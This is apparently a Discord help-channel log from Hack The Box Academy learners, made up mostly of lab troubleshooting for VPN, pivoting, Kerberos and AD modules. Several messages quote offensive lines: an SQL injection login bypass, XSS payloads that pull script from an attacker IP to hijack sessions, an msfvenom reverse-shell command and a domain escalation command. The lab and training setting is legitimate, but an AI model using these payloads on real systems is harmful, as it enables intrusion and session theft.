https://academy.hackthebox.com/module/18/section/2093
Question :
What is the Type of the service of the "dconf.service"?
Tried:
```
─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ sudo systemctl show dconf.service^C
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ systemctl list-units --type=service | grep dconf
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ systemctl list-unit-files | grep dconf
┌─[eu-academy-6]─[10.10.15.18]─[htb-ac-2056516@htb-hrc0hoadlw]─[~]
└──╼ [★]$ sudo systemctl show -p Type dconf
Type=
```
Any hint ?
Google is your friend
can anyone help me in "windows file transfer method". i cant able to connect with RDP, it shows tls handshake failed
Hi all
Executing query: SELECT * FROM logins WHERE username='tom' AND password = 'tom' or '1'='1';
Login successful as user: admin
What wrong ?
Try to log in as the user 'tom'. What is the flag value shown after you successfully log in?
you can dm me
contact me via the green chat bubble so I can help deal with you
mongod is a #starting-point machine, you'll have to read and follow #welcome instructions to access it
I can't login to access the green chat bubble...
you shouldn't have to log in, considering the fact that you can ask the chat bubble about log in issues
yes
typically found at the bottom right there should be a little chat bubble thing (may need to disable adblock for it)
I'm still not seeing it after disabling my adblockers and trying a different browser, could you send me a screenshot by chance?
issue got solved with help of @opal shuttle , i changed to TCP instead of udp vpn.
try emailing then customerops@hackthebox.com
I did already this morning :/
ahhhh could be DNS
Need some help? Learn how to reach the support team on Academy.
Okay yup I got it now after changing my DNS settings back to default. 👍
thanks Rem. will do
is htb server currently down cuz i can't start instance?
Welcome to the HTB Status Page
everything looks fine to me
¯_(ツ)_/¯
try refreshing the page, changing vpn regions, logging out and back in
ok
yo
Good morning
hi, i want to subscribe student course but my silver course is still available. How can I do to get student course immediately?
Idk I have the silver yearly plan
Gonna go for a drive get my mind right for a day of learning
reach out to support
I need some help
SOCKS5 Tunneling with chisel, I transferred my file over to the compromised server but im getting this error:
```
~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
```
How can I fix this?
statically compile it or use an older version
Hi I'm working on the Pass the Ticket from Windows Section and am currently stuck on the second question:
Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john
I have tried to run the commands from the section both with mimikatz and Rubeus to get the ticket for john. However when looking at the output there is no john user to be found. Julio is there and some others but no john and doing the dir *.kirbi gives me the same.
Anyone have any idea on how to continue further or a hint to push me in the right direction?
If you exported all tickets and the user you need wasn't included in that export, I would try it again. If this still doesn't provide the ticket, restart the lab, give it a couple of extra minutes after it displays the target IP to ensure things are completely setup, then try it again.
will try that thank you
If that doesn't work, you can DM and I will take a look at your command and output.
hello
Hey all. I'm struggling with the File Inclusion Skills Challenge. I can poison the log but whenever I try to get RCE the log seems to die and I have to restart the server. I never get any command output in the log. Any thoughts?
Tried with Burp and just with curl
make sure you bear in mind the quotes being used
I tried both single and double quotes and it didn't seem to make a difference
one will brick the log and you'd need to reset the lab to get it to work properly again
Ok I'll play around with it some more. Thanks!
yo
hello
in pass the hash from password attack module stuck for about a long with the davids hash to read the file david.txt
restarting the lab ended up working for me. Thank you
anyone free to help me
Ok I'm using the proper quotes, or at least it isn't bricking the log anymore and is showing my URL request with the command, but I still don't see any command output in the log
Ok no idea what's happening but I literally just up arrow + entered and am getting command output now
You need to import david's ticket i guess
Then you will get new cmd
As david, then you will be able to access that one
Module Name: Linux Privilege Escalation
Section Name: Environment Enumeration
https://academy.hackthebox.com/module/51/section/1592
Question you're struggling with:
I'm unable to ssh into the target server. The error I get is ssh: connect to host 10.129.xxx.xxx port 22: Connection timed out.
Generally what you've tried (while avoiding spoilers, i.e. logged in as j and couldn't find anything)*
I connected to the vpn and ran ssh htb-student@10.129.xxx.xxx.
support hasnt responded to me
it's been a day I need to buy the exam, it wont let me
I've found that asking for help in the wrong channel gets more attention 
Still I try my best to remember the correct channel to use because it's kinder.
Module Name: Getting Started
Section Name: Service Scanning
https://academy.hackthebox.com/module/77/section/726
Question you're struggling with:
when I conduct an nmap scan I get a "Note: Host seems down" although I'm attempting to scan the ip address specified in the module: 10.129.42.253
Generally what you've tried I've tried using the more detailed nmap scan
Have you connected to the vpn?
Guys Any way to remove Credit Card from the Academy HTB.
yep - I wondered if that might have been the issue but I've checked I'm connected to the vpn - I got the 'Initialization Sequence Completed' response when I ran the openvpn
There is only one way to update the card not to remove
You will need to reach out to support on the site and ask
Ok
Run ip address and send the result here.
ah really? are you experiencing this too?
.
hey, anyone having issues with the vm for "AD Enumeration & Attacks - Skills Assessment Part I"? it's incredibly slow, i can't get a shell for more than 20 seconds, the entire thing hangs
already tried resetting
Hi guys, could use some help with findings from the Reporting module.
- One vulnerability found in 2 different places (like an xss in 2 different subdomains) should be presented as one or two findings?
- Exploiting 2 different AD permissions (like GenericWrite, ExtendedRight, AddSelf,...) for different purposes should be presented as N different findings or just one broader Active Directory ACL Abuse? Same with kerberoasting and cross-forest kerberoasting.
- What if I use a certain finding, to exploit another one? Should I leave this for the attack-chain or should I mention it in the detailed walkthrough of the finding?
Module:
ICMP tunneling with ptunnel-ng
Error:
```
$ sudo ./ptunnel-ng -r10.129.202.64 -R22
./ptunnel-ng: error while loading shared libraries: libcrypto.so.3: cannot open shared object file: No such file or directory
```
I need some guidance here, do I just need to use an older version?
hey, I opened a request through the chat bubble. is it possible you could take a look at this today?
Website support is not provided in Discord, you'll need to wait for a reply.
Compile the binary on an older OS like an Ubuntu 20.04 or some Linux Mint
Reference this part of the section Alternative approach of building a static binary
just out of interest, when I did an nmap scan of my own ip it worked, so perhaps it is the 10.129.42.253 host that is down?
That's what I think too.
I tried pinging the ip I was provided and didn't get a response.
If you do a trace route to the host, where does it stop?
10.10.14.1 is already on the other side of the tunnel. There could be some issue with their internal network
I suggest switching VPN servers. Just download a different OVPN file and see if it works
How long is the CJCA exam?
brilliant - thanks @proven plinth - I'll give it a go! 👌
seems like the same result with a different OVPN file unfortunately:
Try changing regions instead
I suggest to also double check how many tunnel interfaces you have up (using ifconfig) after switching servers. I once made the mistake of having 2 academy openvpn tunnels up and caused an IP conflict.
If that happens use "ps aux | grep openvpn", find the program id and kill the duplicates
@proven plinth @cloud urchin really appreciate the advice - thank you! 🙏
When I ran traceroute it just gives a bunch of asterisks.
sounds like you're not connected
```
Using configuration profile from file: /tmp/.../academy-regular.ovpn
Session path: /net/openvpn/v3/sessions/...
Connected
```
Oh I disabled compression, could that be it?
doubt it, but who knows. i just use openvpn <vpn file> & when i launch it
make sure you don't have multiple vpn connections and are also not using the pwnbox at the same time. if all that is fine, try re-downloading a TCP VPN file from a different server or region and try again.
Oh I was using UDP.
I have only one vpn connection, not using the pwnbox. I'm using a TCP config file for US EAST that has compression disabled, and it doesn't work.
k then try what i said
US East isnt an academy vpn file location
That's a pwnbox location
I don't have openvpn as a command, only openvpn3, which requires a command as an argument.
It doesn't accept putting the file immediately after openvpn3.
If your ovpn file is in downloads, ./Downloads/filename.ovpn
Or ~/Downloads/filename.ovpn
"Doesn't accept" im assuming it gives the "cannot read" error?
openvpn3: Unknown command '/tmp/.../academy-regular.ovpn'
Normally I run session-start like this.
guys hello has anyone completed wpa 2 attacks module if someone did I need some help
Oh so yours is a whole different syntax altogether
I also generally dont recommend saving your vpn config in /tmp/, just save it in home
I don't save it. I typically re-download it every time.
You dont have to, is why my point is lol
If I don't redownload, I save it in an easier location on my main computer and just drag it over when I need to use it.
Why not just use it in the easier location? You don't need to put it in /tmp to use it.
Eh
That way you're also saving yourself from needing to redownload it every time
Whatever workflow works

guys hello has anyone completed wpa 2 attacks module if someone did I need some help
You are in a wrong place bro we are sorry
The easier location is on my home computer, not my virtual machine. Also it stops being easy after a while because it's my download folder.
So I delete it occasionally, like today.
👆
Anyways I still can't ssh.
And traceroute still has asterisks.
Are you using the pwnbox too?
hello
No, my own parrot virtual machine.
can someone help me? im stuck with the machine called "era", is my first medium, i got the admin user and the 3 answers to the questions, but the web tell me that im wrong and i dont think it is, any help from private? please im stuck for 1h
Read and follow the instructions in #welcome; and theres #1398707252629733436
okay sorry
working on 'Web services and API attacks', section: "api attacks", Struggling with question 8 (final assessment). using a simple curl script to send the request, I keep getting errors indicating that I've not yet correctly formed a valid soap request. any advice would be very welcomed. I'm attempting to simply get a valid login response to continue testing that but I'm unsure as to what I've got wrong.
Hi, Can i get some advice on the pivoting, tunneling and port forwarding module? I am trying to answer "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)" but I am having trouble with creating a Meterpreter shell. I constructed the payload by using: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080. The LHOST I set to 172.16.x.x & I copied the payload to the pivot server via using scp. I ran msfconsole & ran the ./backupjob but my msfconsole exploit does not connect to the pivot server. Am I doing this wrong? I have been trying to use different ip addresses & ports from the pivot host but I am still having the same error.
violently suppresses urge to insert 'pivot' gifs
Isn't the LHOST within the multi handler options supposed to be set to 0.0.0.0?
got him thanks r1cky
yes that is correct. To my understanding when making the payload via msfvenom the lhost needs to be the internal ip of the pivot host. so the lhost on msfconsole would be 0.0.0.0 & the lhost when making the payload would be the pivots internal ip
You can just DM so I can see what all you have going on.
Skills assessment?
Yeah
Did you check what you can use from what they already give you?
So, I might be confused because it doesn't appear to me like I've got something that will do what it's asking to do. The way I'm interpreting this is that I have to fuzz the values within the soap envelope and/or the URL, does that sound like I am understanding this correctly?
bro how do I find the password for admin
bruteforcing takes a hell lot of time
have you done the tried and true: admin:admin?
They should have already given you something to work with?
🤔 ok, I'll check again.
Is this not correct?
“Assess the target, identify an SQL Injection vulnerability through SOAP messages and answer the question below”
yes'
im bruteforcing via rockyou.txt lets see
that's the one. there's a python script that will check 'id's, I can modify it to try intruder payloads...
all I'm getting back is "enter a valid param for HackTheB0X API"
So what do you think you should modify with? What do you want it to check? You said it yourself earlier
Did you analyze the wsdl?
Figure out what to modify and what payload you can use.
To get a valid “login”
The question itself pretty much gives it away tbh
I'm sure it does, but something about this module didn't 'click' for me so I don't feel like I understand what's going on.
ill pm you
k
does buying the annual membership provide module walkthroughs for all paths??
yes
but i would advise against using the walkthrough until you've exhausted all other options tbh
I'm not planning on doing tutorials all the way through, but there have been times I'm doing things right and it's just wrong versions of tools or there have been overlapping concepts that don't get revealed until modules down the path.
There's a good reason that some concepts come back, and are explained more in-depth, at a later module.
Let's take the Footprinting and the Attacking Common Services modules as examples of this:
The goal of footprinting is to gain basic information without necessarily attacking the surface, more of a surface level skimming the water, so the goal isn't to attack rather to gain info. I.e. judging the water's depth.
The goal then of Attacking Common Services is to actively go after those services in other ways that gain you even more access.
This explains, in-part, why the FTP and SMB sections really only have you focus on the bare minimum -- anonymous/null sessions to gather info in footprinting
you don't need to go in-depth if you're just looking at the surface for something easy to latch onto
That's not what I mean, theres a difference between lightly touching over a subject vs not mentioning it in the module at all.
For example, I believe it's either attacking passwords or attacking common services where I had to use SQL injections to compromise servers. To you it may seem like common knowledge but the module didn't touch on that at all, it wasn't until later on in the path that I learned about it.
i don't recall SQLi being part of Password Attacks or Common Services but i'm going back over modules so i'll try and keep it in mind. Not doubting what you said, just not in my memory vault
Yes lol, I remember because I spent the whole day on that one box. Not exaggerating either. It was very frustrating, let me see if I still have the notes.
Where is SQLi in password attacks? I just finished that module and I dont think I had to
The Skills assessment?
Attacking Common Services - Skills assessment Hard
SQL Injection/Impersonation of privileges, I think the box said there was two ways to do it, but either way should be at least touched upon in the module.
yeah there's a far different method than SQLi; i don't even remember tbh but it was all methods taught in the module
Everything is taught in the module.
The SQL portion is covered in that module and the two ways skills assessment was the easy one and both ways to do that one are covered.
Hello, im trying to go through the Session Hijacking part of this module and attempting to input
```
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement('script');a.src='http://our_ip/';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://our_ip"/)</script>
```
these scripts with my IP:80 in place of OUR_IP, I have a PHP server listening on my IP:80 and have sent curl get request to make sure it does receive requests on this ip and port, but none of these scripts work when inputting them in the Fullname, Username, and Profile Image Url boxes and hitting register, I don't get any GET requests sent to my php server whatsoever and am trying to troubleshoot the problem and would appreciate ideas.
Thank you for yalls time
don't ask just ask
In pass the certificate attack on academy htb to solve the question what should i do
i tried how they showed but not working
@cloud urchin what attack should i try suggest some name or other things
i haven't done the updated module
Hii
solved if anyone else has this issue, you have to use the private network IP that gets setup when you setup the vpn to connect to HTB not your systems public IP address
https://nohello.net; this isn't #general if you want access to chat there you'll need to read and follow the instructions in #welcome
in hindsight that's a bit obvious, the private ips don't have public internet access, and routing is heavily limited.
i apologize it wasnt obvious to me 🙂
sorry i wasn't available at the time to help walk you through the process of figuring it out
So, is this server for learning how to hack?
hey no problem im just glad that i was able to figure it out, now itll stick with me 😄
it revolves around the various services that hackthebox offers, this particular channel is revolving around helping with the various modules found on https://academy.hackthebox.com/
Private Addresses is a key concept in networking, I suggest taking the modules Introduction to Networking or Networking Foundations to learn more
Ohhhh ok
in short; legal hacking is the name of the game, not ddos or anything that would negatively impact a business
ill look into that, its not in the bug bounty path, but i got access to all up to tier II so thatll definitely clear up some confusion
-# Casually runs nmap on T5 with 10000 minimum rate
I recommend you go through some of the modules in the Information Security Foundations path that are relevant to that pathway before continuing
So say my account got compromised (not asking for assistance here) but if I hacked my way into my account after it got compromised, it would be legal since it's technically still mine?
that would be illegal
That's illegal
the account isn't yours, a company just gives you the namespace
you don't own any of your accounts they are loaned to you by the company you created the account with. For more information read the terms of service.
^
Ahhh ok
it's why companies are allowed to just ban you/revoke your access to said account
the most advice you'll get here regarding account recovery is reaching out to the company in question's support team
I thought it was mine because I created it 😅
Right, got it 🙏🏻✨
nope
in the ever expanding digital landscape it's not an ownership, it's a loan agreement
So the admins of discord is essentially the landlords of our accounts whilst we're just the tenants?
you "creating" your account is just requesting the username/namespace from the company, and them granting it to you (so long as you abide by their terms of service)
Correct
yep
Right- makes sense
it's why, as a public discord especially, we have to abide by the Discord Terms of Service alongside the HTB Terms of Service
In pass the certificate attack on academy htb to solve the question what should i do
i tried how they showed but not working
man someone please give me any idea
Because I've been wanting to learn how to hack, because that way I can learn how to stop my account from getting hacked cuz I'll know all the tricks, then I'll know how to protect my account against them
i don't recall having too many issues following the attack path as described in that section
none working
just make sure you have ntlmrelayx running, and running the one thing (i think pywhisker) in a venv as described
That actually makes alot of sense
the best way to not get your account hacked is to not run any sketchy programs or click on suspicious links
basic internet safety ¯_(ツ)_/¯
since 199x
printerbug?
Pretty much ig 🤔
There were hackers on animal crossing who could spawn amiibo items. Now I think about it.. that was also illegal right?
technically, yes
all it was was rfid spoofing, to put it short
but that's diving way off topic for this channel
if you wanna learn hacking and get a genuine interest in it, it doesn't hurt to at least sign up for hackthebox and check out the tier 0 modules (they're free)
Ok first ntlmrelayx then this tool..?
i just followed as it showed; i'm assuming you're on q1 still?
yes
in order to figure out what you're having issues with i just need to know if you're on the first or second question
yeah on the first question
also "none work" isn't really helpful for diagnosing issues
do you get some form of error (that isn't resolved by the notes on this section)
getting error running the tool you just mentioned i dont have that file
but yes you start with printerbug
i've seen some people get some weird thing with their tooling that gives them the base64 certificate instead of saving it to a file
ntlmrelayx -> printerbug -> rest should follow from here
it's easy to maybe miss over the module running the initial ntlmrelayx command
This is what i am seeing for 3 hours
try resetting the target; changing vpn regions; restarting the ntlmrelayx command
make sure you pay attention to which server connection goes where (DC01 vs CA01)
CA01 being the cert server
OK
printerbug should be calling the DC01, not the CA01 server
idk i just remember double checking what server (whenever it was noted) in the reading
please check 🥲
..
i'm heading to bed ¯_(ツ)_/¯
hey you still there i solved the q1
now for the q2 i have to do the same..?
anyone
password attacks
Pass the certificate
That one is pending
I have done till windows pth
After that there were some pivoting concepts
So i left that module and started pivoting module
I will get back there
Once i completed pivoting one
i have little idea about pivoting so i have to pivot here right?
I have no idea
solved thanks
In SocksOverRdp section of pivoting tunneling and port forwarding module. I'm getting this error while trying to load the dll files as taught in the section
"The module "SocksOverRdp.dll" failed to load. Make sure the binary is stored at the specified path or debug it to check for problems with the binary or dependent .DLL files."
The defender is OFF as well
Operation did not complete successfully because the file contains a virus or potentially unwanted software
Deactivate the Real-time protection in Windows Security
checked it, it was already off
I have a crush on how beautiful any AD exploitation tool looks like
deactivate the AV entirely
It could be flagging it based on static fingerprinting
Is there anyone who solved the Skills Assessment - Password Attacks
Guys, smbd knows when machines become online?
https://academy.hackthebox.com/module/143/section/1508
raiseChild.py -target-exec ACADEMY-EA-DC02) LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
bro i run this command and get win cmd shell, now they want bross hash but when i run mimikatz it gives error. in img
how to do this ?
Guys why hostapd file throws mistake all the time?
I did it as was shown in their module but it throws mistakes all the time
With the Wi-Fi modules I have completed so far, everything shown only works in the machine provided specifically for this purpose. Here, interfaces etc. are configured accordingly and are also compatible. Not every interface supports every operating mode. So if you want to try it outside of the machine provided for this purpose, you must ensure that the hardware is compatible.
Disabled defender AV from group policy but still not working
Bunny in PEAP Relay attack section configuration file throws errors all the time I have manipulated it many times but still errors can you guide why?!
What is the error message?
I work in the same module, but I'm only just getting started with Personal Networks.
Is it normal for Kibana to take minutes to load each page?
yesterday was the same 🙁 im doing this https://academy.hackthebox.com/module/211/section/2256
can I DM you?
sure
Can someone tell me what i have to do with this exercise on the getting started module?
hello community
am new here
what do u recommend for a newbie, thm or htb
would like to be a pentester
hello people
no one here
isnt this 300k server
Scanning with gobuster might help. Travel to the page and look for disallowed pages and look at their source code.
Put the target into your browser.
/robots.txt
if you are absolute beginner you go to try hack me first
learn some networking fundamentals
its all about what you have learnt
see what they taught
and apply there
I have done before using nmap, that gave me admin page directly, but gobuster works as well. Endpoints in robots.txt are not indexable (not visible during the browser research), but if put one of them into the URL i can get the content of that endpoint right?
Just for knowledge
If it's not 403 Forbidden yeah. Some aren't meant to be seen but still can be accessed so try those out, look at the src code and see if they've included any details they shouldnt have
Thx
HTB got all things you need, do information security fundamentals path from htb academy, it can be text heavy but if you can read and understand that, you would have understood the topic on much deeper level than with thm
I am currently attempting AEN doing the web Enum and exploit
I am doing support.inlanefreight.local and I already got the admin cookie. But editing the value doesn't give me access. I tried using burp to see what was going on but it just shows that it redirects me to dashboard and then back to login.
go to general off topic chat bro
can anyone help me plz
nvm, found an alternative
cant somehow
Read and follow #welcome
verify yourself
Hello can anyone help me? I am stuck on the Password Attacks Assessment. I was able to pivot to the internal host using ligolo and then ran nmap on the internal network but can't do anything beyond that 🙁
Yo dudes and dudlets, you gotta knowledge to share ??
I want just a lil guide I am doing all the stuff and learning but it's really vast thing so kinda confused I am
And also Whytf I can't message in #general
What type of network cable is used to transmit data over long distances with minimal signal loss? Can anyone help me? I've been stuck on this "stupid" question for 30 minutes in the Network Foundations module and I've tried answering everything, fiber optics, coaxial, ethernet, digital, analog but nothing works.
Fiber optic cable i guess
since the question is just asking what type of cable
put just Fiber-optic no need to put cable at the end.
When I put the hyphen it was lol thank you so much for the help, I can't believe I got stuck on this because of a hyphen, but thank you so much again
Hi, I am stuck on the Windows Privilege Escalation module in the Windows Server submodule. I cant seem to find the right exploit to privesc even though I almost tried all of them. Is anyone available to discuss this topic ?
anyone at the sql injection who wants to go through it together?
Go to #welcome
Hey guys,
In the "Logrotate" module, I'm using a reverse shell immediately dropped off after getting it
Gotta be fast
Is there any way to get it stable?
Ok, thanks !
Got it thx
I'm trying again today. Here's the output of ip a:
```
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:a2:6b:46 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute enp0s3
       valid_lft 85298sec preferred_lft 85298sec
    inet6 fe80::ff7b:af95:cea2:28b6/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 10.10.15.174/23 brd 10.10.15.255 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::11ac/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::d1c8:a625:ee24:36bf/64 scope link stable-privacy proto kernel_ll
       valid_lft forever preferred_lft forever
```
The output of nmap 10.10.15.174/23:
```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-02 13:58 EDT
Nmap scan report for 10.10.15.174
Host is up (0.00018s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
53/tcp open  domain
Nmap done: 512 IP addresses (1 host up) scanned in 53.05 seconds
```
Ssh doesn't work, and traceroute to target provides asterisks. I redownloaded the ovpn file again, commented out the comp-lzo line, and used openvpn3 session-start --config to connect. It seems I cannot access the network even though I am connected to the vpn.
I'm doing the module on default passwords but it tells me to access ssh to find the mysql credentials but I can't understand how I should find the sql credentials inside an ssh machine if it can be useful this is the link to the module https://academy.hackthebox.com/module/147/section/1328
I tried both UDP and TCP vpns.
Theres a default cred cheatsheet they provide in the module
the thing i don't understand if i have to retrieve credentials from ssh machine or access mysql with default credentials
Try the second thing; mysql is running internally
I tried to log in with the default mysql credentials but it doesn't work. I'm wondering if I should use some wordlist but I'm on an ssh machine.
which module
I have gotten all the answers for the DNS section in the enumeration module of the pentest path, but I still don't understand how I was supposed to explicitly identify the secondary dns server. I did, but it doesn't feel replicable because every query i tried was status: refused and I just operationally tried a zone transfer and got answers. This doesn't feel replicable in a real environment where I would be enumerating. Was this how I was supposed to stumble onto it or was there another way where I would have received information that would have allowed me to conclude that it was serving DNS as well? (tried nmap too, all of the packets were being dropped even if i specified port 53 as the source port)
Theres a handful of default credentials in the default cheatsheet linked in the reading
It's a guessing game, mostly
All, I have spent hours on the Third Parties module of OSINT: Corporate Recon. Has anyone completed this? Can anyone help point me in the right direction? Much appreciated
So.. the methodology is literally to just request a zone transfer? To every subdomain you find? There isn't anything else I can do?
You can likely make educated guesses as to which are websites
Lab machine connection unstable!
Hello! I just started working on the "Active Directory Enumeration & Attacks" module
https://academy.hackthebox.com/module/143
It's great that it's set up like a real penetration test! However I'm having trouble maintaining connection to the provided lab machine ATTACK01 and it's slowing me down. Regardless if I'm using SSH or RDP, doing it from my own Kali VM via the VPN or PwnBox, the result is the same, every couple of minutes the connection is lost and it's hard to get it back.
It's really slowing down the work and it's been this way for at least a couple of days. Anyone else had this issue? Status page, https://status.hackthebox.com/, indicates everything should be fine.
i would do a lot of scanning with gobuster see directories that are 200 or 301
those are usually accessible
Try changing vpn regions
As Marcie said, try changing vpn regions. Make sure to select the TCP VPN. If that doesn't work, make sure you aren't using the Pwnbox and your VM at the same time as they share the same IP and it causes network problems.
Great! I'll do that. In a nutshell, why's TCP better than UDP?
Connection oriented protocol
almost done with cracking into htb now just javascript obnomistration
I didn't realize that. That's real good to know! Thanks a lot!
deobfuscation* oops
Biggest tip for that module: dont work ahead
facts
i found myself like overcomplicating things in the privilege escalation
i hope i didnt do it baCKWARDS lmao
By work ahead I mean: it's easy to start to deobfuscate/cleanup and you end up with the flag for the next section
numerous extra scanning and enumerating which is good practice but missed some small things that were in my face
ohh
whattt
What youre talking about is just doing extra work
yuh exactly lol
thats interesting u said i could get flag for next one i gotta be careful then
Working ahead is; module is at step 1, and you managed to get to step 5
Then wonder why the flag doesn't work
go along as it comes
i got nice note section on my laptop which is good the ones on the site stay with the module
after this is when i can choose my next path correct?
i also terminate each machine after the lesson idk if that has to do with what youre saying
I got it working and solved the question. I just can't use openvpn3 because compression is necessary.
Can I DM you? I want to ask a specific question but don't want to give any information away.
Ill just ask it here. So if I can get a zone transfer that gives me additional subdomains, I am expected to brute force all of the subdomains (with all the wordlists I have for discovery?) as well as attempt the 2 queries (NS and ANY) as well as try a zone transfer?
Any is generally a deprecated query; however i wouldn't say all the wordlists. Best practice is start small then go bigger
Best practice is about to be me writing a rust program to automate that nonsense. Feels pretty sketch I'm not gonna lie. Like it would be incredibly easy to miss something here.
Well theres the dnsenum tool that exists to make life a bit easier
correct but I would still have to change the wordlist I would want to try and wait for the scan and rinse and repeat
Imo I wouldn't try and get bogged down in finding every little thing
Once you find new info: act on it
but there are already tools ..you dont need to reinvent the wheel..there are many tools like subbrute, dnsenum etc
You know youre right, maybe dnsenum has an option that allows a list of wordlists and a list of subdomains, that would make it easier to automate.
yup
then at least it would be down to like 3 commands per subdomain
which module you are doing?
i still may make a program so it can be one command instead of 3 lol
Enumeration DNS
ohkk
I honestly may even multithread it
you can..but be sure you dont get false results by being too speedy
dont increase the number of threads too much
Tbh, dns enum isnt really that big a deal
Thats why its barely touched on
Hello everyone I'm on this module https://academy.hackthebox.com/module/143/section/1484
Trying Petitpotam, I am getting clock skew issue on the command python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSI...SNIP...CKBdGmY= dc01.ccache any guidance?
Try changing vpn regions or using a tool like faketime
The issue:
```
2025-08-01 16:25:57,977 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-08-01 16:25:58,089 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/opt/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/opt/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/opt/PKINITtools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
  File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.20-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Name: KRB_AP_ERR_SKEW Detail: "The clock skew is too great"
```
but how can I know the time of the DC..to adjust accordingly?
I think you can just use the ip/host in one of the args
Word maybe ill just save myself the time then.
